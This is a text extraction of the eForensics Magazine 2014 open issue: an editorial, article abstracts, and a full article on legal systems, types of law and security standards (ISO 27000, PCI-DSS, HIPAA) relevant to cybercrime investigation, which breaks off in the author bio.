eforensics open 2014-2

8/10/2019 EForensics Open 2014-2

1/72


2/722 www.eForensicsMag.com

TEAM

Editor:

Joanna [email protected]

Betatesters/Proofreaders:

Olivier Caleff, Kishore P.V., JohanScholtz,

Mark Dearlove, Massa Danilo, Andrew

J. Levandoski, Robert E. Vanaman, Tom

Urquhart, M1ndl3ss, Henrik Becker,

JAMES FLEIT, Richard C Leitz Jr

Senior Consultant/Publisher:

Pawe Marciniak

CEO:Ewa Dudzic

[email protected]

Marketing Director: Joanna Kretowicz

[email protected]

Art Director:Ireneusz Pogroszewski

[email protected]

DTP:Ireneusz Pogroszewski

Publisher:Hakin9 Media Sp. z o.o. SK02-676 Warszawa, ul. Postpu 17D

Phone: 1 917 338 3631

www.eforensicsmag.com

DISCLAIMER!

The techniques described in our articles

may only be used in private, local net-

works. The editors hold no responsibility

for misuse of the presented techniques or

consequent data loss.

Dear Readers,

We are pleased to present you our new OPEN issue Cyber-

Crime and CyberSecurityof eForensics Magazine with

an open access, so that everybody interested in the sub-

ject is able to download it free of charge. This edition was carefully

prepared to present our Magazine to a wider range of readers. We

hope that you will enjoy reading our Magazine and subjects covered

in this issue will help you to stay updated and aware of all possible

pitfalls!

This particular edition will focus on the importance of legal and

regulatory aspects for the cybersecurity and cybercrime. You can-

not overestimate importance and necessity of eForensic analysis

in a society where the Internet assumes the biggest and on-going

change in our lifetime. We use forensic analysis with the purpose

of crime investigation; but to do that effectively we should under-

stand which laws and regulations have been broken. It is crucial to

understand what legal systems are existing, what are the types of

law, standards, types of cybercrime, the part of the computer sys-

tem and, of course, how one can apply this knowledge.

Additionally, we will cover topic of CSA STAR Certification, an effec-

tive way of evaluation and comparison of cloud providers. Technolog-

ical developments, constricted budgets, and the need for flexible ac-

cess have led to an increase in business demand for cloud computing.

Many organizations are wary of cloud services due to apprehensions

around security issues. eForensics Magazine in cooperation with BSI

GROUP prepared an excellent workshop where you can master your

knowledge required to get CSA STAR Certification.

Whats more we added one article from our Packet Analy-

sis workshop as a trial. More materials you can find under

http://eforensicsmag.com/course/packetanalysis/ .

Read our new issue and get all the answers you were looking for!

We would like to thank you for your interest and support and invite

you to follow us on twitter and Facebook, where you can find the lat-

est news about our magazine and great contests. Do you like our maga-

zine? Like it, share it! We appreciate your every comment and would

be pleased to know what are your expectations towards our magazine!

Keep your information safe and do not forget to send us your feed-

back. Your opinion is important to us!

Valeriia Vitynska

eForensics Assistant Manager

and eForensics Team
http://c/Users/irek/AppData/Local/Adobe/InDesign/Version%207.5/en_US/Caches/InDesign%20ClipboardScrap1.pdfmailto:mailto:ewa.dudzic%40software.com.pl?subject=mailto:mailto:jaonna.kretowicz%40eforensicsmag.com?subject=mailto:mailto:ireneusz.pogroszewski%40software.com.pl?subject=http://www.eforensicsmag.com/http://eforensicsmag.com/course/packetanalysis/http://eforensicsmag.com/course/packetanalysis/http://www.eforensicsmag.com/mailto:mailto:ireneusz.pogroszewski%40software.com.pl?subject=mailto:mailto:jaonna.kretowicz%40eforensicsmag.com?subject=mailto:mailto:ewa.dudzic%40software.com.pl?subject=http://c/Users/irek/AppData/Local/Adobe/InDesign/Version%207.5/en_US/Caches/InDesign%20ClipboardScrap1.pdf



CYBERCRIME AND CYBERSECURITY THE LEGAL AND REGULATORYENVIRONMENTby Iana Fareleiro and Colin RenoufIn this article we will look at the environment in which eForensics exists; the legal and regulatory

regimes in which systems and cyber criminals operate. We perform forensic analysis on systems to

investigate a crime and hopefully prosecute a criminal; but to do that we need to understand whichlaws and regulations have been broken. There are pitfalls in working out what laws and regulations

are in operation for a particular context; as what is illegal in one regime may not be in another, and

is it the law in the location of the system or the criminal that applies? The information here forms the

underlying legal knowledge in the CISSP certification and underpins the International Information

Systems Security Certification Consortium (ISC)2 knowledge.

ARE 2 FACTOR AUTHENTICATIONS ENOUGH TO PROTECT YOUR MONEY?TARGETING ITALIAN BANK AND CUSTOMERSby Davide Cioccia and Senad AruchDuring last few years banks, and different financial institutions, have been trying to protect or pre-

vent fraud and cyber-attacks from accessing their customers credentials. They increased security and

login factors to avoid these kind of problems. One of these is the Two Factor Authentication (2FA),used to help username and password to protect the bank account.

AN OVERVIEW OF CLOUD FORENSICSby Dejan LukanWhen discussing cloud forensics, were actually talking about the intersection between cloud com-

puting and network forensic analysis. Cloud computing basically refers to a network service that we

can interact with over the network; this usually means that all the work is done by a server some-

where on the Internet, which might be backed up by physical or virtual hardware. In recent years,

there has been a significant increase on the use of virtualized environments, which makes it very

probable that our cloud service is running somewhere in a virtualized environment.

AUTHENTICATING REMOTE ACCESS FOR GREATER CLOUD SECURITYby David Hald, co-founder, chief relation officerThe nature and pace of business have changed as technology has opened new possibilities for or-

ganizations. One of these possibilities is cloud services, which benefit companies by enabling remote

access to data stored offsite. Its convenience has made cloud services incredibly popular, both to

business and malicious actors. With so much data at stake, the rise in the use of remote access neces-

sitates ironclad security. Authenticating the identities of users remotely accessing these resources

has never been more critical.

PACKET ANALYSIS WITH WIRESHARK AND PCAP ANALYSIS TOOLSby Eric A. VanderburgAlmost every computer today is connected. Their communication with others takes the form of pack-

ets which can be analyzed to determine the facts of a case. Packet sniffers are also called as networkanalyzers as it helps in monitoring every activity that is performed over the Internet. The information

from packet sniffing can be used to analyze the data packets that uncover the source of problems

in the network. The important feature of packet sniffing is that it captures data that travels through

the network, irrespective of the destination. A log file will be generated at the end of every operation

performed by the packet sniffer and the log file will contain the information related to the packets.

UNDERSTANDING DOMAIN NAME SYSTEMby Amit Kumar SharmaDomain Name System (DNS) DNS spoofing also referred to as DNS cache poisoning in the techni-

cal world is an attack whereinjunk (customized data) is added into the Domain Name System name

servers cache database, which causes it to return incorrecdata thereby diverting the traffic to the at-

tackers computer.



CSA CERTIFICATION OFFERS SIMPLE, COST EFFECTIVE WAY TO EVALUATEAND COMPARE CLOUD PROVIDERSby John DiMariaTechnological developments, constricted budgets, and the need for flexible access have led to

an increase in business demand for cloud computing. Many organizations are wary of cloud ser-

vices, however, due to apprehensions around security issues. Ernst & Young conducted a surveyof C-level leaders in 52 countries which showed a unified concern over the accelerated rate that

companies are moving information to the cloud and the subsequent demise of physical bounda-

ries and infrastructure.

ROAD MAP TO CSA STAR CERTIFICATION OPTIMIZING PROCESSES,REDUCING COST AND MEETING INTERNATIONAL REQUIREMENTSby John DiMariaFor centuries, the Swiss dominated the watchmaking industry and their national identity was some-

what tied to their expertise in the precision mechanics required to making accurate timepieces. Yet

the Swiss were so passionate about their expertise that they hesitated to embrace the new tech-

nology in watchmaking with batteries and quartz crystals. With Japans introduction of the quartz

wristwatch in 1969, the majority Swiss market share dropped from 80% at the end of World War II toonly 10% in 1974 (Aran Hegarty, Innovation in the Watch Industry, Timezone.com, (November 1996)

http://people.timezone.com/library/archives/archives0097). Ironically, it was the Swiss who had in-

vented the quartz watch but failed to see its potential.

EFORENSICS CSA STAR CERTIFICATION SUPPLY CHAIN MANAGEMENTUSING CSA STAR CERTIFICATIONby John DiMariaWhen an organization adopts cloud services, it is in fact expanding its operations from a local or re-

gional presence to a more global one. As a result, the corresponding organizational operations strat-

egy needs to be adjusted to align with these changes. A more formal analysis of the supply-chain as

part of a more comprehensive due diligence review also needs to be considered (By definition, the

Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alli-ance to help enterprises assess the risk associated with a cloud computing provider).

CONTINUOUS MONITORING CONTINUOUS AUDITING/ASSESSMENT OFRELEVANT SECURITY PROPERTIESby John DiMariaWhile the Cloud Security Alliances (CSA) STAR Certification has certainly raised the bar for cloud

providers, any audit is still a snap-shot of a point in time. What goes on between audits can still be a

blind spot. To provide greater visibility, the CSA developed the Cloud Trust Protocol (CTP), an industry

initiative which will enable real time monitoring of a CSPs security properties, as well as providing

continuous transparen-cy of services and comparability between services on core security proper-

ties (Source: CSA CTP Working Group Charter). This process is now being further developed by BSI

and other industry leaders. CTP forms part of the Governance, Risk, and Compliance stack and theOpen Certification Frame-work as the continuous monitoring component, complementing point-in-

time assessments provided by STAR certification and STAR attestation. CTP is a common technique

and nomenclature to request and receive evidence and affirmation of current cloud service operat-

ing circumstances from CSPs.



CYBERCRIME AND

CYBERSECURITY THE LEGAL AND REGULATORY ENVIRONMENT

by Iana Fareleiro and Colin Renouf

eForensic analysis becomes essential and necessary in a

society where the Internet assumes the biggest and on-goingchange in our lifetime. It will take place as a result of a crime or

investigation. However, what is relevant and worth searching

for, or even what can be legally analyzed, depends on the

legal systems and regulations, the criminal and, maybe, even

customers or users affected.

The laws broken may be existing laws pertaining to theft or threats of vio-lence where the computer systems are central, or the computer systemmay be on the periphery of the crime, or it may be specific information

systems or computer privacy laws and regulations that are relevant; possiblyeven a combination of all of them. These laws and regulations may conflict,and what is illegal in one country or region may not be illegal in another.

As a cyber security expert we need to understand what we are aiming to

prove and what data we can legally investigate before we begin our work.

In addition to existing laws within the legal systems at work, specific cy-ber laws were created to protect individuals, companies and governmentsagainst cyber crime; which can be divided in three categories:

Computer-assisted crime is where a computer is used as a tool to assiston committing a crime,

Computer-targeted crime happens when a computer was the main targetand victim of an attack,

The last category includes situations where the computer happens to beinvolved in a crime; but is not the attacker or attackee; and is peripheral

to the crime itself.

These categories were created to facilitate the law enforcement of cybercrimes. Laws can be general and include numerous scenarios, instead of theneed to create specific laws for each individual case.

What you will learn:

In this article we will look at the envi-

ronment in which eForensics exists;

the legal and regulatory regimes in

which systems and cyber criminals

operate. We perform forensic analy-

sis on systems to investigate a crime

and hopefully prosecute a criminal;

but to do that we need to under-

stand which laws and regulationshave been broken. There are pitfalls

in working out what laws and regula-

tions are in operation for a particular

context; as what is illegal in one re-

gime may not be in another, and is it

the law in the location of the system

or the criminal that applies? The in-

formation here forms the underlying

legal knowledge in the CISSP certi-

fication and underpins the Interna-

tional Information Systems Security

Certification Consortium (ISC)2 body

of knowledge.



The idea is to use the existing laws for any crime where possible, allowing an easier understanding ofthe basis for prosecution for all people involved, including the judge and jury, who can then provide theverdict and sentence based on existing guidelines and standards.

The downside of introducing specific cyber laws is that, for example, when companies are attacked

they just want to ensure that the vulnerability exposed is fixed and avoid any embarrassment that wouldadversely affect the company reputation. Even when information as to an attack leaks out companies donot seem interested on spending time and money in courts; preferring to minimize the time of embarrass-ment. This is the main reason as of why cyber criminals are unpunished and easily get away with such il-legal actions. Not many companies wish to be known as victim of a cyber attack since that can adverselyinfluence customer confidence and scare away investors

LEGAL SYSTEMSThere are essentially four different models of legal systems; civil law, common law, religious law, andcustomary law.

CIVIL LAW

In civil law, employed by most countries, a legislative branch of the government develops and docu-ments statutes and laws, and then a judiciary has some latitude for interpreting them. The legislation isprescriptive so legal precedence, whilst existing, has little force. In some such systems, such as that de-rived from Roman law or the later Napoleonic code, the judge assesses the proof as a measure of guiltof the criminal.

COMMON LAWThis system, used in the UK, US, Canada, Australia and other former British colonies amongst others,is often derived from the English legal system. A legislative branch of government still produces statuesand laws, but great emphasis is placed on judicial interpretation, precedent and existing case law; whichcan even override and supersede the legislation and statute if a conflict is found to occur. Thus, time isimportant in this system as judicial interpretation may develop and traditional interpretation of custom

and natural law acts as a basis for the system. The judiciary and its interpretation of the legislation andprecedent in existing case law has a greater role in this system than in the civil law system. In the Eng-lish legal system and its derivatives the role of the jury to interpret the evidence in assessing the burdenof proof is common.

RELIGIOUS LAWIn religious law, such as Sharia Law adopted by several Islamic countries and groups, religious texts anddoctrine provide the basis for the legal system, rather than separate statute and legislation. Here thegiven target religion is accepted by the majority of the people or their rulers; such that they essentiallybecome laws to which the people abide. The laws enforced may be interpreted from the appropriate re-ligious texts by religious leaders; such as imams or ayatollahs.

CUSTOMARY LAWIn this existing regional customs accepted by the majority of the people over a period of time providethe basis for the legal system to the extent that they essentially become laws to which the people abide.These customs may later be codified to some extent. This model is seen in the other legal models induty of care and best practice interpretation as what would be expected of a reasonable man as ameasure; such as in the tort law of the civil law branch of common law.

TYPES OF LAWSWithin common law itself, civil law plays a part, alongside criminal law, tort law and administrative law.

As groups of countries collaborate, such as in the European Union (EU), the combinations become morecomplex, but the types of law are common at the core due to the prevalence of the English legal systemand its derivatives in the UK, US, Australia, etc.

CRIMINAL LAWIn criminal law the aim is law and order of the common citizen and deterrence of criminals when pun-ishing offenders; so the victim of the crime is considered society itself from the view of prosecution,even though the actual victim may be a person or persons. Hence, the existence of the Crown Pros-ecution Service (CPS) in the UK for pursuing the criminal through the courts under criminal law with



an aim to remove the offender from affecting society. The criminal is incarcerated or even deprived ofhis or her life under some circumstances so there is an emphasis on burden of proof being beyondreasonable doubt.

CIVIL LAW

Here the individual has been wronged and seeks legal recourse in terms of damages from a civil defend-ant, rather than loss of liberty, with the evidence essentially reduced from beyond all reasonable doubtto a likelihood known as a preponderance, i.e. more likely than not. The damages for the wrongdoingmay be statutory as prescribed by law, compensatory to attempt to balance loss or injury, or punitive todiscourage and deter from future legal violation.

TORT LAWThis is a branch of civil law related to wrongdoing against an individual measured against best practiceor duty of care, where the action taken or negligence of responsibility of an individual or organizationis considered to be outside the bounds expected of behavior of a reasonable, right thinking, or prudentman; and in this relates back to custom, and often may change over time. Here again, the burden ofproof is on preponderance of the evidence weighing against the defendant. This is the largest source of

lawsuits and damages under major legal systems.

This is particularly important in the realms of cyber security laws. In protecting customer data thePrudent Man Rule is applied to set the bar for duty of care in what processes, infrastructure and prac-tices a right thinking person would consider necessary as a minimum. If a business is seen to be belowthat bar of expectation then the organization and business stakeholders are considered negligent in pro-viding the necessary due care to protect its customers, assets and business stakeholders.

A company has to exercise due diligence continuously in reviewing its own and third party partnersand processes to ensure that the necessary standard of due care is being met. As the technologies andthreats in the industries adapt all of the time, due diligence ensures the minimum bar changes accord-ingly. Whenever a new third party is brought into a company processes the necessary due diligence in

assessing that party for past criminal history, threats and their own due care protection standards anddue diligence processes must be performed.

CONTRACT LAWAgreements between companies and individuals can be broken, whether verbal or documented in writ-ing, and damages for wrongdoing can occur. This is again a type of civil law.

ADMINISTRATIVE AND REGULATORY LAWThis covers governance, compliance and regulatory laws relating to government and government agen-cies. Governments enact these laws with less influence from the judiciary. Compliance laws, such asSarbannes-Oxley, come under this branch of the legal system.

INTELLECTUAL PROPERTY LAWSOne of the targets in many cyber crimes is stealing intellectual property, so companies go to great tech-nical lengths and legal lengths to protect it. Whilst intellectual property isnt physical in nature, compa-nies require creativity and then investment to capitalize on it. It takes a number of forms from trademark,copyright, licenses, patents and even simple trade secrets that a company entrusts to its staff.

A trademark is a name, image or logo for a brand that is used in marketing and is associated witha brand by its customers and competitors; and it may be formally registered or unregistered. Whilst steal-ing the logo itself is not usually a major criminal target, in phishing attacks a log may be used to misrep-resent the cyber criminals web site as that of the company owning the brand.

Copyright is the right of an owner of a musical, artistic or literary work to own, duplicate, distribute and

amend that work themselves. Often cyber criminals will duplicate a copyrighted work and sell it or pro-vide it for download as their own property.

A patent is a legal agreement protecting the use of an idea or invention such that the patent holderhas exclusive rights on the use and licensing of that idea for a period of time covered by the patent.Some rogue nations and cyber criminals will ignore the patent and use the invention or idea as their own,



and legal recourse is then required by the patent holder to obtain compensation. A license is a contractbetween a vendor and consumer or business to use software within the bounds of an end user licenseagreement, and not duplicate, modify, redistribute or sell on that software.

A trade secret is proprietary information belonging to a business in a competitive market that its staff

and third parties should not divulge, and is often subject to a non-disclosure agreement(NDA) that isa contract between the business and a third party or employee to not divulge that secret. The businessmust exercise due care to protect that trade secret.

DATA PRIVACY LAWSWith the rise in cyber crime and stealing of customer data being a regular objective of the cyber criminal,most countries and states introduced their own data protection laws. These cover the processes and ex-pected standard behavior for protecting data, but often also include clauses as to where that data can belocated and what countries and under what circumstances it can be shared.

In the US the Privacy Act of 1974 protects the data held by the US government on its citizens, and howit is collected, transferred between departments, and used; with individuals having legal recourse on be-

ing able to request access to the data held about them, with national security providing the main limita-tion to that access. Similarly, in the European Union the EU Data Protection Directive sets the bounda-ries on the collection and flow of personal data between member nations; with a fine line between theneeds of commerce between different member nations and the privacy of the individual. The EU prin-ciples are considered more stringent than those of the US, so the EU-US Safe Harbor legal frameworkallows that EU data to be shared with US organizations if they adhere to the more stringent EU DataProtection Directive principles.

The EU Data Protection Directive principles are:

Individuals must be notied how their personal data is collected and used Individuals must be able to opt out of sharing their data with third parties

Individual must opt in to shared sensitive personal data Reasonable protections must be in place to protect the personal data

This latter rule brings in the duty of care legal measure.

The United States Code Section 1030 Title 18, usually known as the Computer Fraud and Abuse Actdefines the environment in which systems are considered to have been attacked in government and com-mercial organizations and the recourse against the criminal. This was amended by the Patriot Act 2001as a response to the September 11thattacks to allow easier implementation of wiretaps by law enforce-ment agencies and easier sharing of data between those agencies, along with more stringent punishmentfor damaging a protected system from the original act or dealing with individuals on the sanctions list.The Identity Theft Act further amends the original act to provide additional protection for the individual.

STANDARDSInternational bodies, industries, and some groups of companies may produce their own standards towhich individuals and companies may comply, and claiming such compliance is a requirement for takingpart in that industry from a financial or regulatory perspective, or may be required as part of a contract.So, companies supporting the payments with debit and credit cards usually have to adhere to the PCI-DSS standards mandated by the card industry vendors, or health service vendors in the US must deliverto HIPAA data security standards for patient data as mandated by US administrative law.

In the early days of networked IT (1995) the British Standards Institute started to develop BS7799 thatoutlines how an information security management system should be designed, built and maintained;with guidelines on what is necessary in the forms of policies and processes; along with the technologies

necessary to holistically protect sensitive information from the physical, to the network, to the electronic.From this the ISO/IEC 27000 standards were developed; using an iterative process where objectivesand plans are formed (Plan), then implemented (Do), the results measured to see if the objectives weremet (Check), and then amendments made as necessary(Act) the whole iterative process is known asthe PDCA cycle.



ISO27000The ISO and International Electrotechnical Commission (IEC) standards bodies jointly issue the ISO27000Information Technology Security Techniques family of standards for information security managementbest practice for risks and controls; which was, as mentioned, derived from the earlier BS7799 BritishStandard and the later ISO/IEC 17799 standard. These bodies have a committee called Joint Technical

Committee 1 (JTC 1) Subcommittee 27 SC27 that meets twice a year to consider and ratify the stand-ards and amendments to provide the information security management system (ISMS), with the 27000base standard providing an overview of the complete family of policy-oriented standards and the vocabu-lary used throughout. The individual standards are as follows:

ISO/IEC

Standard

Description

27000 Information security management systems Overview and vocabulary

27001 Information security management systems Requirements

27002 Code of practice for information security management

27003 Information security management system implementation guidance

27004 Information security management Measurement

27005 Information security risk management

27006 Requirements for bodies providing audit and certification of information security management systems

27007 Guidelines for information security management systems auditing

27008 Guidance for auditors on ISMS controls

27010 Information security management for inter-sector and inter-organizational communications

27011 Information security management guidelines for telecommunications organizations based on ISO/IEC 27002

27013 Guideline on the integrated implementation of ISO/IEC 27001 and ISO/IEC 20000-1

27014 Information security governance

27015 Information security guidelines for financial services

27017 Information security management for cloud systems

27018 Data protection for cloud systems

27019 Information security management guidelines based on ISO/IEC 27002 for process control systems specific

to the energy utility industry

27031 Guidelines for information and communication technology readiness for business continuity

27032 Guideline for cybersecurity

27033 IT network security, a multi-part standard based on the ISO/IEC 18028:2006

27033-1 Network security Part 1: Overview and concepts

27033-2 Network security Part 2: Guidelines for the design and implementation of network security

27033-3 Network security Part 3: Reference networking scenarios Threats, design techniques and control issues

27033-5 Network security Part 5: Securing communications across networks using Virtual Private Networks (VPNs)27034-1 Application security Part 1: Guidelines for application security

27035 Information security incident management

27036 Information security for supplier relationships

27036-3 Information security for supplier relationships Part 3: Guidelines for information and communication

technology supply chain security

27037 Guidelines for identification, collection, acquisition and preservation of digital evidence

27038 Specification for redaction of digital documents

27039 Intrusion detection and protection systems

27040 Guideline on storage security

27041 Assurance for digital evidence investigation methods27042 Analysis and interpretation of digital evidence

27043 Digital evidence investigation principles and processes

27799 Information security management in health using ISO/IEC 27002



These arent laws, but many contracts will insist that participants adhere to the complete body of thestandard, or its individual components. Adherence to the standard or its components can also be usedas a quality measure, and can act as a selling point; and in negotiations this can be important. Therefore,this standard can appear in the enacting of contract law.

The individual components cover investigation and forensic analysis, as well as relationships with thirdparties. However, one of the key areas where the standard impacts the legal environment for cyber se-curity is in the influence it has had on other standards and regulations that can be enforced as the costof doing business in some industries, e.g. PCI-DSS in companies involved in credit card sales. Whenevaluating compliance or where criminal responsibility is being assessed ISO/IEC27000 provides a ba-sis by which what is expected of the reasonable man can be measured from a legal perspective.

INFORMATION TECHNOLOGY INFRASTRUCTURE LIBRARY ITILITIL, like the foundations of ISO/IEC27000 was developed by the UK government, with an aim of stand-ardizing and documenting service management and aligning IT with the business with a common lan-guage. IT should provide good customer service to the business it serves. Whilst not providing a securityframework it does cover support, change and maintenance processes and all of the foundations for busi-

ness continuity and disaster recovery management with great strength in incident management.

It covers supplier management, service level management, service catalog management, availabilitymanagement, incident management, event management, problem management, change management,knowledge management, release and deployment management, service testing and validation, and therequirements of a configuration management system. It has processes for service design, service op-eration and service transition. Across all of this is continual process improvement as a result of servicereporting and service measurement. At the core of ITIL is the concept of IT as a service.

Again, ITIL is referenced in contracts and often used as a selling point, but in the legal world outside ofcontracts is more useful as a measure of the expectations for the reasonable man.

CONTROL OBJECTIVES FOR INFORMATION AND RELATED TECHNOLOGIES COBITThis was produced by the Information Systems Audit and Control Association in 1996 as a generalframework of processes, policies, and governance for the management of IT as a whole, not just secu-rity; and the current version aligns with ITIL and ISO27000 standards to provide a full framework andmodel for IT as the basis of a capability maturity model.

It splits IT into domains; Plan and Organize, Acquire and Implement; Deliver and Support; and Monitorand Evaluate; and across these includes a framework, process descriptions, control objectives, manage-ment guidelines, and maturity models.

Whilst ISO27000 provides high level guidelines and processes, the COBIT model contains specific de-tails, such as for user access management and compliance, and how to work with third parties; with a

lot of helpful security details particularly in the Plan and Organize, and Acquire and Implement domains;with the processes heavily emphasized in the other two domains.

Again, as in ISO/IEC27000, COBIT is often referenced as a selling point or in contracts, but also pro-vides specific processes that tie up with the reasonable man assessment from a legal perspective.

PAYMENT CARD INDUSTRY DATA SECURITY STANDARD PCIDSSThe major card companies (e.g. Visa, MasterCard, American Express, JCB, etc) got together in 2006 tocome up with a set of standards for data security that could be measured and enforced for companieswishing to participate in payment card processing. Annually a Qualified Security Assessor (QSA) createsa report on compliance to the standards that are split into 12 requirements in 6 groups.



Control Objectives PCI-DSS Requirements

Build and Maintain a Secure

Network

1. Install and maintain a firewall configuration to protect cardholder data

2. Do not use vendor-supplied defaults for system passwords and other security

parameters.

Protect Cardholder Data 3. Protect stored cardholder data

4. Encrypt transmission of cardholder data across open, public networks

Maintain a Vulnerability

Management Program

5. Use and regularly update anti-virus software on all systems commonly affected

by malware

6. Develop and maintain secure systems and applications

Implement Strong Access Control

Measures

7. Restrict access to cardholder data by business need-to-know

8. Assign a unique ID to each person with computer access

9. Restrict physical access to cardholder data

Regularly Monitor and Test

Networks

10. Track and monitor all access to network resources and cardholder data

11. Regularly test security systems and processes

Maintain an Information Security

Policy

12. Maintain a policy that addresses information security

The aim of the PCI-DSS standards is to ensure consistency across the card payments industry in theway that customer details and the necessary card data useful for making payments is protected and han-dled. It covers requirements for technology, processes and the relationships with the business and thestaff involved. From a customer perspective this acts to protect customers in that companies adhering tothe PCI standards can be trusted to look after the data and later fraud would be unexpected. Reviews ofcontinued compliance is required by any company adopting PCI; with the QSA making an assessmentand recommendations for any areas of improvement required.

So, adherence to PCI is usually contractual, which is how it relates to the law; yet again anyone deal -ing with payment card data would be expected to follow the recommendations within the standard and,thus, fits with the reasonable man assessment within legal frameworks. Whilst US federal law doesntmandate companies adhere to PCI-DSS if dealing with card data, the laws in some states within the USand elsewhere do refer to it so it is likely to become the law in the future. MasterCard and Visa requireservice providers and merchants to be validated for PCI-DSS compliance, and banks must be audited,whereas validation isnt mandatory for all entities.

HEALTH INSURANCE PORTABILITY AND ACCOUNTABILITY ACT HIPAAThe HIPAA act is a US federal law that covers many areas, but part of it also includes standards for dataprivacy that overlap with the data privacy laws in some countries and also tie back to the reasonableman rule in the gray area between law and standard. Therefore, many information security certifica-

tions (CISSP), and standards reference the act and its standards worldwide. The objective of the HIPAAregulatory framework was to provide a secure way for the health insurance of US citizens to be sharedbetween providers when changing or losing jobs, ensuring the citizens not only had any confidential per-sonal information or medical condition information protected physically, but also that the policies were inplace to ensure their health insurance benefit position was maintained.

The act is in two parts. The first part (Health Care Access, Portability, and Renewability) covers thepolicies for which US citizens maintain their health insurance across providers, what their entitlementis when switching providers; and as such isnt applicable to the information security realm at the detaillevel. The second part (Preventing Health Care Fraud and Abuse; Administrative Simplification; MedicalLiability Reform) and its details on data privacy is more relevant to information security professionals,and it is here than granular standards exist and there is an overlap with data privacy laws elsewhere.

The Privacy Rule and Security Rule subsections are key here, and the latter includes the standards. TheSecurity Rule is split into Administrative Safeguards, Physical Safeguards and Technical Safeguardsand includes standards for encryption, checksums, etc as well as risk management and risk assessmentprocesses. In interpretation of adherence to these process standards the reasonable man rule is againbrought into use from a legal perspective as the prescriptiveness of the standards is open to interpreta-tion and applicability at many levels.



NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY NISTThis is not like the other paragraphs here in that it refers to a standards issuing body as a whole, likethe ISO/IEC or BSI bodies referenced earlier; but is mentioned due to its issuing of very detailed build,hardening, and usage standards for IT and security that are often referenced by other standards (e.g. itis often used as best practice build and configuration standards for PCI-DSS compliance) and again act

as a yardstick for the reasonable man rule in assessing whether a reasonable attempt was made tosecure data.

The NIST maintains an Information Technology Portal with a standard Cybersecurity Framework, Com-puter Security Resource Centre, and other documentation and groups: http://www.nist.gov/.

The US government maintains a standard configuration document for Windows 7 and Red Hat Enter-prise Linux 5 on this site that shows how builds should be done. Of more interest beyond the reasonableman debate are the standards and guidelines for eForensic analysis.

THE PART OF THE COMPUTER SYSTEMThe computer may be a key part of the criminal or civil act, as in the breaking of cyber laws; or may be a

peripheral part of the crime itself, as in electronic fraud; or may just be a part of the evidence gatheringto build a picture of the crime or criminal. The legal systems and industry standards have specific defini-tions for the role of the computer system in these contexts.

Where the computer plays a role as a tool of the criminal, but the crime is general even though thecomputer is central to the commission of the crime, this is known as a computer as tool scenario. Steal-ing credit card information to commit fraud or penetrating a system to steal company intellectual propertysecrets would be examples of this scenario.

Where the crime has the computer as the primary target or victim of the crime, particularly where in-formation or cyber security laws are broken, are computer system as target scenarios. Hacking to in-stall malware, deployment of computer viruses, and distributed denial of service attacks would fall into

examples of this scenario.

TYPES OF CYBER CRIMEA crime being forensically investigated may be an existing law resulting from theft or a violent act, sofraud using a computer is still fraud and a threat of violence online is still a threat of violence, and a com-puter could be used in hacking to bring about violence or death.

It may also be investigation is required for a specific cyber crime that has been broken pertaining onlyto the use of a computer, such as hacking or denial of service for fun or political motivation.

Finally regulations may be broken using a computer that can be considered legal and contractual; soa system built to Payment Card Industry-Data Security Standards compliance may be a key term in a

contract so non-compliance to the regulations leads to a contractual violation.

HOW DO WE APPLY THIS KNOWLEDGE?To perform forensic analysis we obviously first have to protect the evidence, but what evidence we areallowed to access and what is useful requires first understanding which laws are believed to have beenbroken, the role of the computer, and what laws are in place for the analyst doing the work. It isnt neces-sarily legal to perform forensic analysis and access personal data for a potential criminal without break-ing a privacy law.

The most difficult tasks are when the criminal is in one country or state, the target system is in another,the victim in yet another, and multiple countries have been traversed. Even within a single country like

Australia or the United States different laws can apply state to state. The complexity is why so many

computer related crimes remain unprosecuted, along with the shame for a company in having beenbreached. The key to applying the legal knowledge before doing what is needed to achieve a prosecutionis identifying what is common between the states and countries involved, and new international frame-works of cooperation are being drawn up to assist in this.



INTERNATIONAL LEGAL COOPERATION IN CYBER SECURITYThe increase in cyber crime and the need for coordinated anti-terrorist cooperation across state andinternational boundaries has led to frameworks being drawn up, such as the Safe Harbor coopera -tion between the EU and US. More international work between governments is currently underway tomake this easier, not initially due to basic cybercrime, but the need to combat terrorism and terrorist

funding. The trick is to identify a common subset on protection against fraud and personal data andwork out from that to identify the maximum commonality between all legal state or national entities,and then aim to prosecute in the area where the criminal is most likely to be sentenced; rememberingthat avoiding breaking the law during the analysis in any of the state or nations during the forensic in-vestigation is a necessity.

Post-graduate degrees specifically covering international cyber crime and security are beginning tospring up; such as that being studied by the authors. Personal experience has shown that the specificstate knowledge of experienced lawyers can come to nothing in this internationally complex area, sospecializations in this niche area are likely to grow in importance.

THE INTERNATIONAL, FEDERAL AND STATE INTERPRETATION WHICH LAWS APPLY?

In determining which laws apply to a particular scenario there are four separate considerations that mayinclude different states, countries, and even international groups, such as the EU. When a possible crimeoccurs involving a computer and data in the modern world, to work out which laws apply, we must con-sider the location of the cyber criminal, the location of the system being attacked, the location of any vic-tims, and the locations over which the data forming the attack occurs.

CRIME APPLICABILITY AND INVESTIGATION AN EXAMPLEConsider a mobile phone payments application for purchasing foreign currency for international travel-lers. The user is from the UK, lands in Singapore, but uses a cellphone tower in Malaysia to enact trans-actions hosted on a system in Australia. Which laws apply? In this example, certain compliance restric-tions on checking transactions in Malaysia and Singapore may mean that the application should usegeolocation and cell tower identification to shut down to avoid an impossible legal situation. In forensic

analysis after the fact where access to personal data might be restricted where the analysis is performed,this gets even more complex.

So, if a crime has been deemed to have occurred consider the issue of identifying which country thecrime has been committed in. Then assess which Police or agencies will prosecute. However, taking theexample of the different privacy acts enforced under the EU, US, Australian, New Zealand, laws etc, andeven sharing the evidence with the Police forces can be an issue, because that the personal data of theindividual can only be seen by authorised agents of their own country. Often its best to segregate the da-ta and even store it in location in the given country (such as required for many China financial systems)to avoid the complexities and gives the best chance for prosecution of the criminal.

WHAT HAVE WE LEARNED?

We have looked at the basic types of legal system and how they differ in different countries, and the differ-ent types of laws and regulations that can be broken with different results for the defendant or perpetrator.We have then applied this to examples using computers to see how complex the environment is underwhich cyber security experts must operate to investigate a crime and see what laws and regulations apply.

ABOUT THE AUTHORSColin Renouf is a long standing IT worker, inventor, and author; currently an Enterprise Solution Architect in the finance indus-

try, but having worked in multiple roles and industries over the period of decades. An eternal student, Colin has studied varied

subjects in addition to IT. Having written and contributed to several books and articles on subjects ranging from IT architecture,

